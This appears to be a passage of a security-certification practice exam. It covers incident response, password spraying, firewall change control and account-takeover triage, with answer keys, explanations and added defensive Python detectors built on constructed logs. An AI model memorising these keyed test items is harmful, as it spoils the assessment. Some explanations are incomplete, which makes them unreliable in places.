
Exam trap

The trap here is confusing password spraying with brute force: candidates see 'same password' and think brute force, but the key distinction is the attacker targets many usernames with one password, not one username with many passwords.

How to eliminate wrong answers

Option A is wrong because a brute force attack tries many passwords against a single username, not one password against many usernames. Option C is wrong because credential stuffing uses previously leaked username/password pairs from other breaches, not a single password tested across many accounts. Option D is wrong because a dictionary attack runs a wordlist of candidate passwords against one account; here there is only one candidate password and hundreds of accounts.
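Questions 80, 82 and 87 all come down to the shape of the attempts per source IP, so one added detector (not code from the page) serves all three: it parses authentication log lines, profiles each source by distinct usernames and attempts per username, calls the pattern (spray, brute force, or inconclusive), checks which attempted names are real directory accounts, and lists any successes that the failure-only view would hide. The log format, thresholds and account list are constructed; the thresholds are starting points, not standards.

```python
"""Classify login-failure patterns per source IP (added example, not from the page).

One detector for three scenarios: one password sprayed across many accounts,
many attempts against one account, and random usernames that must be checked
against the directory. Log lines and the account list are constructed.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$")

SAMPLE_LOG = """\
2024-05-01T02:10:00Z src=203.0.113.5 user=alice result=FAIL
2024-05-01T03:40:00Z src=203.0.113.5 user=bob result=SUCCESS
2024-05-01T05:05:00Z src=203.0.113.5 user=carol result=FAIL
2024-05-01T06:55:00Z src=203.0.113.5 user=dave result=FAIL
2024-05-01T09:20:00Z src=203.0.113.5 user=erin result=FAIL
2024-05-01T11:30:00Z src=203.0.113.5 user=frank result=FAIL
2024-05-01T12:00:00Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T12:00:01Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T12:00:02Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T12:00:03Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T12:00:04Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T12:00:05Z src=198.51.100.9 user=admin result=FAIL
2024-05-01T13:00:00Z src=192.0.2.77 user=a1b2c3 result=FAIL
2024-05-01T13:00:01Z src=192.0.2.77 user=x9y8z7 result=FAIL
2024-05-01T13:00:02Z src=192.0.2.77 user=q7w8e9 result=FAIL
"""

DIRECTORY = {"alice", "bob", "carol", "admin", "svc-backup"}  # constructed account list


def parse(log_text):
    """Keep only lines that match the expected format."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def profile_sources(events):
    """Per source IP: total attempts, attempts per user, successes, first/last seen."""
    profiles = defaultdict(lambda: {"attempts": 0, "per_user": defaultdict(int),
                                    "successes": [], "first": None, "last": None})
    for e in events:
        p = profiles[e["src"]]
        p["attempts"] += 1
        p["per_user"][e["user"]] += 1
        if e["result"] == "SUCCESS":
            p["successes"].append(e["user"])
        p["first"] = p["first"] or e["ts"]
        p["last"] = e["ts"]
    return profiles


def classify(profile, spray_min_users=5, spray_max_per_user=3, brute_min_attempts=6):
    """The distribution of attempts, not their count, separates spray from brute force."""
    users = len(profile["per_user"])
    most = max(profile["per_user"].values())
    if users >= spray_min_users and most <= spray_max_per_user:
        return "password_spray"
    if users == 1 and most >= brute_min_attempts:
        return "brute_force"
    return "inconclusive"


def analyze(log_text, directory):
    """Per-source report: pattern, which attempted names are real, and any successes."""
    report = {}
    for src, p in profile_sources(parse(log_text)).items():
        report[src] = {
            "pattern": classify(p),
            "attempts": p["attempts"],
            "distinct_users": len(p["per_user"]),
            "real_accounts": sorted(set(p["per_user"]) & set(directory)),
            "successes": p["successes"],
            "window": (p["first"], p["last"]),
        }
    return report


if __name__ == "__main__":
    for src, row in analyze(SAMPLE_LOG, DIRECTORY).items():
        print(src, row)
```

On the sample, 203.0.113.5 is the spray from question 80 and 87 (six names, one try each, spread over nine hours) and it includes a success for bob that a failed-login threshold would never surface; 198.51.100.9 is a brute force on admin; 192.0.2.77 is the question 82 case, where the first thing to learn is that none of the random names exist in the directory.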

88
MCQ · medium

A firewall rule change was implemented directly in production to allow a new vendor IP range. Within minutes, several internal services became unreachable because the rule order changed unexpectedly. Which change-management practice would have most likely prevented this outage?

A. Testing the change in a staging environment and approving it through a peer-reviewed change process before production.
B. Applying the rule during business hours so the team can respond faster if something breaks.
C. Making the change first in production because that is the only environment that matters.
D. Documenting the outage after the vendor confirms their IP range is valid.
Answer: A

A tested, peer-reviewed change process helps catch rule-order problems, dependency issues, and unintended access impacts before production is affected. Firewall changes can alter traffic flow in subtle ways, so validating them in a nonproduction environment and having a formal approval path reduces the chance of service disruption. A backout plan also gives the team a quick recovery path if the production change behaves differently than expected.

Why this answer

Option A is correct because implementing the change in a staging environment first allows validation of the rule order and its impact on traffic flow without affecting production. A peer-reviewed change process ensures that the rule insertion point (e.g., before a deny-all or after a permit statement) is verified, preventing the accidental reordering that caused the outage. This aligns with the change-management principle of testing in a representative environment before production deployment.

Exam trap

The trap here is that candidates may confuse 'change management' with 'incident response' or 'documentation,' leading them to choose options that address symptoms (e.g., faster response or post-hoc documentation) rather than the root cause of unvalidated rule order changes.

How to eliminate wrong answers

Option B is wrong because applying the rule during business hours does not address the root cause—unexpected rule reordering—and may increase risk if the change breaks services during peak usage. Option C is wrong because making the change directly in production bypasses all validation and review, which is precisely the practice that led to the outage. Option D is wrong because documenting the outage after the fact does nothing to prevent it; proactive change management requires testing and approval before implementation.
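What the staging test in option A would actually check, as an added example (not from the page or any firewall vendor): a first-match policy is evaluated against a list of flows that must keep working, and the verdicts before and after the change are diffed, so a reordering that shadows existing permits fails the review before it reaches production. The rules, the addresses and the "deploy tool re-sorted the list" failure are all constructed.

```python
"""Rule-order regression test for a firewall change (added example, not from the page).

Models a first-match policy and diffs verdicts for known flows before and
after a change. Rules, flows and addresses are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple

Flow = Tuple[str, str, int]  # (source IP, destination IP, destination port)


@dataclass(frozen=True)
class Rule:
    name: str
    action: str           # "permit" or "deny"
    src: str              # CIDR
    dst: str              # CIDR
    dport: Optional[int]  # None matches any port


def matches(rule: Rule, flow: Flow) -> bool:
    src, dst, dport = flow
    return (ipaddress.ip_address(src) in ipaddress.ip_network(rule.src)
            and ipaddress.ip_address(dst) in ipaddress.ip_network(rule.dst)
            and (rule.dport is None or rule.dport == dport))


def evaluate(rules, flow):
    """First matching rule wins; anything unmatched hits the implicit deny."""
    for rule in rules:
        if matches(rule, flow):
            return rule.action, rule.name
    return "deny", "implicit-deny"


def review_change(before, after, flows, intended):
    """Split verdict changes into those the change request asked for and the rest.

    `intended` maps a flow to the verdict the change is supposed to produce;
    any other verdict change is a regression.
    """
    result = {"intended": [], "unintended": []}
    for flow in flows:
        b, a = evaluate(before, flow), evaluate(after, flow)
        if b[0] == a[0]:
            continue
        entry = {"flow": flow, "before": b, "after": a}
        bucket = "intended" if intended.get(flow) == a[0] else "unintended"
        result[bucket].append(entry)
    return result


# --- constructed policy ----------------------------------------------------
INTERNAL_TO_APP = Rule("internal-to-app", "permit", "10.0.0.0/8", "10.20.0.0/16", 443)
APP_TO_DB = Rule("app-to-db", "permit", "10.20.0.0/16", "10.30.0.5/32", 5432)
BLOCK_INTERNAL = Rule("block-all-to-internal", "deny", "0.0.0.0/0", "10.0.0.0/8", None)
VENDOR_TO_APP = Rule("vendor-to-app", "permit", "203.0.113.0/24", "10.20.0.0/16", 443)

BEFORE = [INTERNAL_TO_APP, APP_TO_DB, BLOCK_INTERNAL]
# What actually got pushed: the deploy tool re-sorted the list and the
# catch-all deny now sits above the internal permits.
BAD_AFTER = [VENDOR_TO_APP, BLOCK_INTERNAL, INTERNAL_TO_APP, APP_TO_DB]
# The change as it should have been staged: vendor permit just above the deny.
GOOD_AFTER = [INTERNAL_TO_APP, APP_TO_DB, VENDOR_TO_APP, BLOCK_INTERNAL]

FLOWS = [
    ("10.1.2.3", "10.20.1.1", 443),      # user to internal app
    ("10.20.1.1", "10.30.0.5", 5432),    # app to database
    ("203.0.113.7", "10.20.1.1", 443),   # the new vendor access
    ("203.0.113.7", "10.30.0.5", 5432),  # vendor must still not reach the database
]
INTENDED = {("203.0.113.7", "10.20.1.1", 443): "permit"}

if __name__ == "__main__":
    for label, after in (("bad", BAD_AFTER), ("good", GOOD_AFTER)):
        print(label, review_change(BEFORE, after, FLOWS, INTENDED))
```

Against BAD_AFTER the review reports the vendor flow as intended and the two internal flows as unintended regressions, which is the outage in the question caught in staging. Against GOOD_AFTER only the intended change appears. The flow list is the part worth maintaining: every service that has ever been broken by a firewall change earns a line in it.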

89
MCQ · medium

A branch office's network closet has repeated unauthorized access issues after staff badge in and hold the door for others. Management wants a control that allows one person through after valid badge use and helps prevent tailgating. Which control is best?

A. Closed-circuit television cameras, because they record the doorway for later review.
B. A mantrap, because it physically restricts entry to one person at a time.
C. A motion sensor, because it can detect movement inside the room.
D. A door closer, because it ensures the door automatically shuts after use.
Answer: B

A mantrap creates a controlled entry space that helps block tailgating and enforces single-person access after authentication.

Why this answer

A mantrap is a physical security control consisting of a small space with two interlocking doors, typically requiring authentication to enter and exit. It ensures that only one person can pass through at a time, effectively preventing tailgating by trapping unauthorized individuals between the doors if they attempt to follow an authorized user.

Exam trap

The exam often tests the distinction between preventive and detective controls, leading candidates to choose CCTV because it is a common security measure, even though it does not actively prevent tailgating.

How to eliminate wrong answers

Option A is wrong because closed-circuit television cameras are a detective control, not a preventive one; they record incidents for later review but do not physically stop tailgating in real time. Option C is wrong because a motion sensor detects movement inside the room but does not control entry or prevent multiple people from passing through a door simultaneously. Option D is wrong because a door closer only ensures the door shuts after use; it does nothing to stop a second person walking through while the door is held open, which is exactly the behavior described.

90
MCQ · easy

An EDR alert shows a user workstation launching an unfamiliar executable from the Downloads folder and then making repeated outbound connections to an IP address in another country. What is the best first response by the security team?

A. Wait for more alerts before taking any action to avoid disrupting the user
B. Isolate the workstation from the network and begin incident triage
C. Immediately reinstall the operating system without collecting evidence
D. Disable the user's account in the directory service and close the ticket
Answer: B

This contains the suspected threat quickly while preserving enough evidence for triage and next steps.

Why this answer

Option B is correct because isolating the workstation from the network immediately stops the potential command-and-control (C2) communication and prevents lateral movement, which is the priority first response in incident triage. The EDR alert indicates a suspicious executable from the Downloads folder making repeated outbound connections to a foreign IP, which strongly suggests malware or a trojan. Isolating the host preserves volatile evidence (e.g., memory, network connections) for forensic analysis while containing the threat.

Exam trap

The trap here is that candidates may confuse incident response phases (e.g., jumping to eradication or recovery before containment) or think that disabling the user account is sufficient, when in fact the running process must be contained first to stop active network communication.

How to eliminate wrong answers

Option A is wrong because waiting for more alerts allows the malware to continue exfiltrating data or spreading to other systems, violating the containment-first principle of incident response. Option C is wrong because immediately reinstalling the OS destroys all volatile evidence (e.g., memory, running processes, network artifacts) needed for root cause analysis and attribution, and may miss persistence mechanisms. Option D is wrong because disabling the user account does not stop the already-running malicious process from making outbound connections or executing further payloads; the host must be contained first.

91
MCQ · medium

A finance laptop is powered on, the user is still logged in, and it remains connected to Wi-Fi after a malware alert. What should the responder do first to preserve volatile evidence?

A. Power the laptop off immediately to stop any further attacker activity.
B. Collect volatile data such as memory, running processes, and active network connections.
C. Run a full antimalware scan before touching any other data.
D. Disconnect the power cable and remove the battery to prevent changes.
Answer: B

Volatile evidence is the first thing to lose when a machine shuts down or is rebooted, so collecting it immediately is the best move. Memory, process lists, open sockets, and logged-in sessions can reveal malware injection, command-and-control activity, or stolen credentials in use. Preserving that state before containment actions or shutdown gives investigators a better picture of what happened on the system.

Why this answer

Option B is correct because the laptop is powered on, the user is logged in, and it is connected to the network, meaning volatile data (memory contents, running processes, active network connections) is at immediate risk of being lost if the system is shut down or tampered with. The responder must collect this data first to preserve evidence of the malware's current state, including any malicious processes, network connections, and in-memory artifacts that would disappear on power loss.

Exam trap

The trap here is that candidates mistakenly believe immediate shutdown (Option A) stops attacker activity, but in forensic practice, preserving volatile evidence by capturing memory and network state is always the priority before any power-down action.

How to eliminate wrong answers

Option A is wrong because powering off the laptop immediately destroys all volatile data (RAM, process lists, network connection states) and may trigger anti-forensic mechanisms in malware that wipe traces on shutdown; the correct first step is to capture volatile data before any power state change. Option C is wrong because running a full antimalware scan modifies the system state (reads files, creates logs, may quarantine or delete files) and overwrites or destroys volatile evidence in memory and active connections, violating forensic preservation principles.

92
MCQ · hard

Based on the exhibit, what is the best eradication decision for the server compromise?

A. Restart sshd and monitor the system for another login attempt.
B. Manually delete the cron entry and reverse the SSH change on the live server.
C. Rebuild the server from a trusted image and restore only known-good data after evidence is preserved.
D. Increase the SIEM retention period and keep the current server online.
Answer: C

The server shows multiple signs of compromise: unauthorized key-based access, script download, cron persistence, and SSH configuration tampering. Those indicators make simple cleanup too risky. A rebuild from a trusted image is the most reliable eradication step, especially once the host is isolated. Evidence should be preserved first, then the service should be restored from validated data and a hardened baseline.

Why this answer

Option C is correct because a server compromise implies that the attacker may have achieved persistence through modified binaries, kernel modules, or rootkits that cannot be reliably removed by simple remediation steps. Rebuilding from a trusted image ensures that all malicious artifacts are eliminated, and restoring only known-good data from backups (after forensic preservation) prevents reintroduction of compromised files. This aligns with the CompTIA incident response process, where eradication must remove all traces of the threat, and rebuilding is the safest approach for a confirmed compromise.

Exam trap

The trap here is that candidates may think manual remediation (Option B) is sufficient because they underestimate the attacker's ability to hide persistence mechanisms, or they confuse containment (e.g., isolating the server) with eradication (completely removing the threat).

How to eliminate wrong answers

Option A is wrong because restarting sshd does not remove the attacker's persistence mechanism (e.g., modified SSH configuration or cron job) and only temporarily disrupts access; the attacker could simply log in again. Option B is wrong because manually deleting a cron entry and reversing an SSH change on a live server is unreliable—the attacker may have installed a rootkit, backdoor, or modified system binaries that cannot be fully reversed, leaving the system still compromised. Option D is wrong because increasing SIEM retention does not address the existing compromise; keeping the compromised server online continues to expose the network to data exfiltration or lateral movement.

93
MCQ · easy

A branch office loses power briefly several times each month. Which control best helps keep network equipment running long enough for an orderly shutdown?

A. A UPS
B. A badge reader
C. A locked filing cabinet
D. A fire extinguisher
Answer: A

A UPS provides temporary battery power so systems can stay up briefly or shut down safely.

Why this answer

A UPS (Uninterruptible Power Supply) provides battery backup power to network equipment during a power outage, allowing enough time for an orderly shutdown to prevent data corruption or hardware damage. Unlike surge protectors, a UPS actively supplies clean, regulated power from its batteries when the mains fail, making it the correct control for this scenario.

Exam trap

The trap here is that candidates might confuse a UPS with a surge protector or power strip, thinking any power-related device provides backup runtime, whereas only a UPS contains batteries to sustain power after an outage.

How to eliminate wrong answers

Option B is wrong because a badge reader is an access control mechanism used to restrict physical entry to a facility or room, not a device that provides backup power. Option C is wrong because a locked filing cabinet is a physical security control for protecting sensitive documents, not for maintaining power to network equipment during an outage.

94
MCQ · medium

A SOC analyst reviews email platform logs for a finance user account. At 08:12, the user successfully signs in from Denver. At 08:15, the same account signs in from a residential ISP in another state. At 08:16, the mailbox creates a new external forwarding rule and deletes the original alert message. The user says they did not set up forwarding. What is the best assessment?

A. False positive caused by normal mailbox synchronization behavior across devices.
B. True positive indicating likely account compromise and unauthorized mailbox abuse.
C. Benign activity because the user successfully authenticated with valid credentials and no malware was detected.
D. A denial-of-service event because the attacker is attempting to overwhelm the mail system.
Answer: B

The sequence of impossible travel, an unexpected sign-in source, and creation of an external forwarding rule strongly indicates unauthorized access. Deleting the alert email suggests the attacker is trying to hide evidence. The most likely conclusion is that the account is compromised and requires immediate response actions.

Why this answer

The rapid succession of logins from geographically distant locations (Denver and a different state via a residential ISP) within three minutes, followed immediately by creation of an external forwarding rule and deletion of the original alert message, is a classic indicator of account takeover. The user's denial of setting up forwarding confirms the activity is unauthorized. This pattern aligns with attacker behavior: after compromising credentials, they establish persistence (forwarding) and cover tracks (deleting alerts).

Exam trap

The trap here is that candidates mistakenly equate valid authentication with legitimate activity, ignoring the strong circumstantial evidence of impossible travel and unauthorized rule creation that clearly indicates compromise.

How to eliminate wrong answers

Option A is wrong because normal mailbox synchronization across devices would not create an external forwarding rule or delete an alert message; synchronization only replicates existing folder/item changes, not administrative rule creation. Option C is wrong because successful authentication with valid credentials does not rule out compromise—attackers often use stolen or phished credentials, and the subsequent anomalous actions (geographic impossibility, rule creation) override any assumption of benign activity. Option D is wrong because a denial-of-service event would involve overwhelming the mail system with traffic, not a single account's specific configuration changes and message deletion.
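The assessment logic of this question, written out as an added Python example (not part of the original question set): consecutive sign-ins whose implied travel speed is impossible, followed within minutes by an external forwarding rule and deletion of the alert message, score as a true positive, while the same account syncing from two nearby devices does not. The event schema, coordinates, domain names and thresholds are constructed assumptions.

```python
"""Account-takeover assessment from mailbox platform events.

Added example, not part of the original question set. It applies the reasoning
above to an event stream: two sign-ins whose implied travel speed is impossible,
followed within minutes by an external forwarding rule and deletion of the alert
message, is assessed as a true positive, while the same account syncing from two
nearby devices is not. Event schema, coordinates, domains and thresholds are
constructed assumptions.
"""
from __future__ import annotations

import math
from dataclasses import dataclass
from datetime import datetime, timedelta

INTERNAL_DOMAIN = "corp.example"            # constructed: rules forwarding elsewhere are external
MAX_PLAUSIBLE_KMH = 900.0                   # faster than this between sign-ins is impossible travel
POST_SIGNIN_WINDOW = timedelta(minutes=10)  # how long after the odd sign-in to look for abuse


@dataclass(frozen=True)
class Event:
    ts: datetime
    account: str
    kind: str          # "signin", "create_forward_rule", "delete_message", "sync"
    detail: str = ""   # rule target, message subject or client name
    lat: float = 0.0   # sign-in geolocation (constructed values)
    lon: float = 0.0


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(signins: list[Event]) -> tuple[Event, Event] | None:
    """Return the first consecutive sign-in pair whose implied speed exceeds the threshold."""
    for a, b in zip(signins, signins[1:]):
        hours = (b.ts - a.ts).total_seconds() / 3600
        km = haversine_km(a.lat, a.lon, b.lat, b.lon)
        if km > 0 and (hours <= 0 or km / hours > MAX_PLAUSIBLE_KMH):
            return a, b
    return None


def assess_account(events: list[Event], account: str) -> tuple[str, list[str]]:
    """Return (verdict, reasons) for one account, following the question's logic."""
    evs = sorted((e for e in events if e.account == account), key=lambda e: e.ts)
    pair = impossible_travel([e for e in evs if e.kind == "signin"])
    if pair is None:
        return "benign", []
    first, odd = pair
    km = haversine_km(first.lat, first.lon, odd.lat, odd.lon)
    minutes = (odd.ts - first.ts).total_seconds() / 60
    reasons = [f"impossible travel: {km:.0f} km between sign-ins {minutes:.0f} min apart"]
    # Post-compromise actions that follow the anomalous sign-in: persistence and cover-up.
    for e in evs:
        if not (odd.ts <= e.ts <= odd.ts + POST_SIGNIN_WINDOW):
            continue
        if e.kind == "create_forward_rule" and not e.detail.endswith("@" + INTERNAL_DOMAIN):
            reasons.append(f"external forwarding rule to {e.detail}")
        elif e.kind == "delete_message" and "alert" in e.detail.lower():
            reasons.append(f"alert message deleted: {e.detail!r}")
    if len(reasons) >= 2:
        return "true_positive_account_compromise", reasons
    return "suspicious_signin_review_required", reasons


def constructed_sample_events() -> list[Event]:
    """The finance-account sequence from the question, plus a benign multi-device user."""
    t = datetime(2024, 5, 1, 8, 12)
    denver = (39.74, -104.99)        # constructed coordinates
    other_state = (33.45, -112.07)   # constructed stand-in for the second sign-in location
    boulder = (40.01, -105.27)
    return [
        Event(t, "finance.user", "signin", "corporate laptop", *denver),
        Event(t + timedelta(minutes=3), "finance.user", "signin", "residential ISP", *other_state),
        Event(t + timedelta(minutes=4), "finance.user", "create_forward_rule", "collector@example.net"),
        Event(t + timedelta(minutes=4, seconds=20), "finance.user", "delete_message",
              "Security alert: new forwarding rule created"),
        # Benign: one user, two devices in nearby cities 40 minutes apart, normal sync.
        Event(t + timedelta(hours=1), "sales.user", "signin", "desktop", *denver),
        Event(t + timedelta(hours=1, minutes=40), "sales.user", "signin", "phone", *boulder),
        Event(t + timedelta(hours=1, minutes=41), "sales.user", "sync", "phone"),
        Event(t + timedelta(hours=1, minutes=42), "sales.user", "create_forward_rule",
              "finance.user@" + INTERNAL_DOMAIN),
    ]


SAMPLE_EVENTS = constructed_sample_events()
```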

95
Multi-Select · medium

A security analyst is reviewing incident response procedures. Which three of the following activities are typically performed during the 'Containment, Eradication, and Recovery' phase of the incident response process? (Choose three.)

Select 3 answers
A. Isolating affected systems from the network to prevent further damage
B. Removing malicious files and restoring systems from known good backups
C. Rebuilding compromised servers from a secure baseline image
D. Conducting a lessons-learned meeting with the incident response team
E. Escalating the incident to law enforcement agencies
F. Performing forensic imaging of all systems before any action is taken
Answers: A, B, C

Why this answer

The 'Containment, Eradication, and Recovery' phase focuses on stopping the spread of an incident, removing the root cause, and restoring normal operations. Isolating affected systems (containment), removing malicious files and restoring from backups (eradication/recovery), and rebuilding from a secure baseline (recovery) are all core activities in this phase, as defined by NIST SP 800-61 Rev. 2 and CompTIA's incident response framework.

Exam trap

The trap here is that candidates confuse the 'Containment, Eradication, and Recovery' phase with the 'Detection and Analysis' phase, mistakenly selecting forensic imaging or escalation as part of containment when they are actually pre-containment steps to preserve evidence and notify stakeholders.

96
MCQ · medium

A SOC analyst receives an alert from the EDR system indicating that the process 'C:\Program Files\Vendor\Updater.exe' attempted to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key on a user's workstation. The analyst checks the file hash and finds it matches a known legitimate software updater. Which of the following actions is most appropriate for the analyst to take?

A. Disable the software updater immediately to prevent further registry modifications.
B. Create an exception rule in the EDR to suppress future alerts for this process.
C. Investigate the user's recent activity and check for signs of process hollowing or DLL injection.
D. Isolate the workstation from the network and reimage the system immediately.
Answer: C

This is the correct next step. The analyst should examine the process's behavior in depth, including checking for anomalies such as unexpected command-line arguments, suspicious parent processes, or indicators of code injection, before concluding whether the alert is a false positive.

Why this answer

Option C is correct because the EDR alert indicates a legitimate process (Updater.exe) modifying a critical persistence registry key (Run). Even with a known good hash, the process could be compromised via process hollowing or DLL injection, where malicious code runs under the guise of a trusted executable. Investigating user activity and checking for these attack techniques is the appropriate next step to confirm whether the behavior is benign or indicative of a threat.

Exam trap

The trap here is that candidates assume a matching file hash guarantees the process is safe, overlooking that attackers can subvert a legitimate process at runtime through memory-based attacks that do not alter the file on disk.

How to eliminate wrong answers

Option A is wrong because disabling the software updater without evidence of malicious activity would disrupt legitimate updates and potentially cause system instability or security gaps. Option B is wrong because creating an exception rule would suppress all future alerts for this process, blinding the SOC to potential compromises that reuse the same executable name or hash. Option D is wrong because isolating and reimaging the workstation is an extreme, resource-intensive response that is not justified when the process hash matches a known legitimate file and there are no confirmed indicators of compromise.

97
MCQ · easy

A laptop is suspected of being used in a malware incident. It is still powered on and connected to Wi-Fi. What should the responder do before shutting it down?

A. Install endpoint protection updates on the laptop right away.
B. Capture volatile evidence such as running processes and memory contents.
C. Delete suspicious files so the malware can no longer spread.
D. Reboot the laptop immediately to clear the suspected malware.
Answer: B

This is the best action because volatile data can disappear when the system is powered off or rebooted. Running processes, network connections, logged-on users, and memory contents may contain the strongest clues about active malware and attacker activity. Preserving this information first supports later investigation and helps responders understand what happened before they take more disruptive containment steps.

Why this answer

Option B is correct because volatile evidence, such as running processes, network connections, and memory contents, is lost when the system is powered off. Capturing this data first preserves critical forensic artifacts that can reveal the malware's behavior, persistence mechanisms, and indicators of compromise (IOCs). In a live incident, the responder must follow the order of volatility (RFC 3227) to collect the most ephemeral data before it disappears.

Exam trap

The trap here is that candidates mistakenly think immediate containment (e.g., deleting files or rebooting) is the priority, but the SY0-701 exam emphasizes preserving volatile evidence first to support forensic analysis and legal proceedings.

How to eliminate wrong answers

Option A is wrong because installing endpoint protection updates could alter the system state, overwrite evidence, or trigger anti-forensic behavior by the malware. Option C is wrong because deleting suspicious files destroys evidence and may not stop the malware, which could be running in memory or have persistence mechanisms. Option D is wrong because rebooting clears volatile memory (RAM), losing critical evidence like running processes, network connections, and injected code, and may allow malware to evade detection.

98
MCQ · medium

A scan keeps reporting the same medium-severity TLS configuration issue on a public web server. The application owner says the vendor software cannot be changed until next quarter, but they can place the service behind a reverse proxy that enforces stronger cipher settings. How should the issue be handled in the vulnerability management process?

A. Close the finding as fixed because the reverse proxy reduces the risk
B. Record an exception, document the compensating control, and set a review or remediation date
C. Mark the finding as a false positive and remove it from future scans
D. Ignore the finding until the vendor releases a new version
Answer: B

An exception with documented mitigation and follow-up keeps the risk visible and tracked until the underlying issue can be remediated.

Why this answer

Option B is correct because the vulnerability management process requires that when a vulnerability cannot be immediately remediated, compensating controls must be formally documented as an exception with a scheduled remediation date. In this scenario, the reverse proxy enforces stronger cipher settings, effectively mitigating the TLS misconfiguration at the network edge, which is a valid compensating control. Recording the exception ensures auditability and prevents the finding from being prematurely closed while the vendor software remains vulnerable.

Exam trap

The trap here is that candidates assume a compensating control automatically closes the finding, when in fact vulnerability management requires an exception process with documentation and a future remediation date to ensure the root cause is eventually addressed.

How to eliminate wrong answers

Option A is wrong because simply placing a reverse proxy does not fix the underlying TLS configuration on the origin server; the finding should not be closed as 'fixed' since the vulnerability still exists on the server itself. Option C is wrong because the TLS configuration issue is a real vulnerability, not a false positive, and removing it from scans would bypass proper risk tracking and violate vulnerability management best practices.

99
MCQ · easy

A SOC analyst sees 38 failed logins for a finance user account from one public IP address over 4 minutes, followed by one successful login. What should the analyst do first?

A. Immediately delete the account to stop any further access attempts.
B. Correlate the authentication logs with user activity and VPN records to verify whether the login pattern is expected.
C. Assume the account is compromised and notify all users to change their passwords.
D. Close the alert because one successful login means the activity was normal.
Answer: B

Correlating related logs is the best first step because it helps determine whether the event is a real attack or an expected user behavior pattern. Authentication logs, VPN records, and account activity can show whether the source IP, timing, and device match a legitimate session. Good triage focuses on confirmation before disruptive response actions.

Why this answer

Option B is correct because the analyst must first verify whether the failed logins followed by a successful login represent a brute-force attack or legitimate behavior, such as a user mistyping their password and then succeeding. Correlating authentication logs with user activity and VPN records helps confirm if the public IP belongs to a known remote user or VPN endpoint, which is a standard first step in incident response to avoid false positives.

Exam trap

The trap here is that candidates assume a successful login after many failures always indicates compromise, but the question tests the critical first step of verification through log correlation before taking any action.

How to eliminate wrong answers

Option A is wrong because immediately deleting the account disrupts business operations and destroys forensic evidence; account deletion should only occur after thorough investigation and confirmation of compromise. Option C is wrong because assuming compromise without verification leads to unnecessary panic and password fatigue; the analyst must first correlate logs to determine if the activity is expected before initiating a password reset. Option D is wrong because one successful login after many failures does not indicate normal activity—it could indicate a successful brute-force attack, and closing the alert without investigation violates security operations procedures.

100
Multi-Select · hard

A SIEM analyst reviews the following sequence from a VPN and email platform over 15 minutes: 47 failed logins against different accounts from one public IP, one successful VPN login from that same IP, a new inbox forwarding rule to an external address, and a mailbox sign-in from a device never seen before. Which three findings most strongly support a password-spraying-to-compromise scenario? Select three.

Select 3 answers
A. Many failed logins across different usernames from the same source IP in a short time window.
B. A successful VPN login from the same source IP after the burst of failures.
C. An inbox forwarding rule sending messages to an external address.
D. A workstation patch installation completed earlier that day.
E. The mailbox server reported normal disk utilization during the same hour.
Answers: A, B, C

That pattern strongly matches password spraying because one attacker tries a small number of guesses across many accounts.

Why this answer

Option A is correct because a high volume of failed logins against multiple accounts from a single public IP within a short time window is the hallmark of a password-spraying attack, where the attacker tries a few common passwords across many usernames to avoid account lockout. This pattern is distinct from a brute-force attack, which targets a single account with many passwords.

Exam trap

The trap here is that candidates may think a single successful login or a forwarding rule alone is suspicious, but the question asks for findings that most strongly support the password-spraying-to-compromise scenario, which requires the combination of the spray pattern, the successful login from the same source, and the post-compromise persistence action.
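An added Python example serving this question and the previous one (not part of the original question set): it parses constructed authentication log lines, finds the densest failure window per source IP, separates the 38-failure single-account burst (brute force) from the 47-failure many-account burst (password spray), and records the success from the same IP that followed each burst, which is the point at which the two questions' next steps diverge. The log format, IP addresses, account names and thresholds are constructed assumptions.

```python
"""Triage a burst of failed logins from one source IP.

Added example, not part of the original question set. It separates the two
scenarios above: 38 failures against one finance account in 4 minutes (brute
force) and 47 failures spread across many accounts in 15 minutes (password
spray), and reports the success from the same IP that followed each burst.
Log format, IP addresses, account names and thresholds are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed line format: "<ISO timestamp> auth=<success|failure> user=<name> src=<ip>"
LINE_RE = re.compile(r"^(\S+)\s+auth=(success|failure)\s+user=(\S+)\s+src=(\S+)$")


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    result: str
    user: str
    src: str


@dataclass
class Finding:
    src: str
    pattern: str                     # "brute_force", "password_spray" or "none"
    failures: int                    # failures inside the densest window
    distinct_users: int              # accounts hit inside that window
    success_after: AuthEvent | None  # first success from the IP after the burst
    next_step: str


def parse_log(text: str) -> list[AuthEvent]:
    """Parse constructed auth log lines, skipping lines in another format."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, result, user, src = m.groups()
            events.append(AuthEvent(datetime.fromisoformat(ts), result, user, src))
    return sorted(events, key=lambda e: e.ts)


def densest_window(times: list[datetime], window: timedelta) -> tuple[int, int]:
    """Two-pointer scan returning indices [i, j) of the busiest window of the given length."""
    best, j = (0, 0), 0
    for i in range(len(times)):
        while j < len(times) and times[j] - times[i] <= window:
            j += 1
        if j - i > best[1] - best[0]:
            best = (i, j)
    return best


def triage_source(events: list[AuthEvent], src: str, window: timedelta = timedelta(minutes=15),
                  min_failures: int = 20, spray_users: int = 5) -> Finding:
    """Classify the failure burst from `src` and locate the success that followed it, if any."""
    fails = [e for e in events if e.src == src and e.result == "failure"]
    i, j = densest_window([e.ts for e in fails], window)
    burst = fails[i:j]
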